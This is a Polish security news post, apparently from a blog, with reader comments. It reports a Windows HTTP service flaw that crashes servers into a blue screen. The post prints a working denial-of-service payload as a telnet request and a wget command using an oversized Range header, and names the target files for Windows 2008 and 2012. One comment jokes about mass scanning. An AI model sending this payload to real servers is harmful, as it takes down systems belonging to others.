Wygląda na to, że mamy pierwszego prostego exploita na poważny błąd w usłudze HTTP w systemach Windows. Na razie to tylko DoS, czekamy dalej na kod prowadzący do RCE. Aby wywołać piękny niebieski ekran trzeba wykonać następującą sekwencję komend:
telnet target 80 GET /iis-85.png HTTP/1.1 Host: cokolwiek Range: bytes=18-18446744073709551615
lub na przykład
wget --header="Range: bytes=18-18446744073709551615 http://192.168.0.28/welcome.png"
Wywołanie GET musi prowadzić do istniejącego pliku, zatem dla Windows 2012 będzie to iis-85.png, a dla Windows 2008 welcome.png. Dalsze dyskusje na temat możliwości wykorzystania błędu oraz exploitów możecie znaleźć na stronach Metasploit, rootsec oraz ma.ttias.be a w serwisie xpaw znajdziecie zdalny tester podatności.
Komentarze
Szybki strzał z masscan i 1/10 internetu padnie?
O ile dobrze rozumiem tu chodzi o serwery a tych akurat nie ma dużo.
maszyn z tym softem faktycznie mało jednak najczęściej są maszyny hostujące aplikacje NET z dostępem do baz firmowych (extranety, sklepy, nawet oprogramowanie remote app viw web, itp) więc błąd jest bardzo poważny
Marcin, a ile to jest w procentach?
Sporo:
http://w3techs.com/technologies/overview/web_server/all
13%
http://news.netcraft.com/archives/2015/03/19/march-2015-web-server-survey.html
28%
Jezu, to się w głowie nie mieści
Nasz standard bezpieczeństwa zabezpiecza przed konsekwencjami tego błędu:
http://fajne.it/standard-konfiguracji-windows.html
Wprawdzie nadal można odpalić DoS, ale exploitować można tylko poprzez odpalenie pojedynczej binarki. Tymczasem nasz standardowy layout katalogów połączony z włączonym SRP powoduje, że odpalenie tej binarki się nie uda.
(Aby było jasne, tak, to jest kryptoreklama. Ale w dobrej intencji.)
Wow, W10 TP padł jak zaczarowany … nice …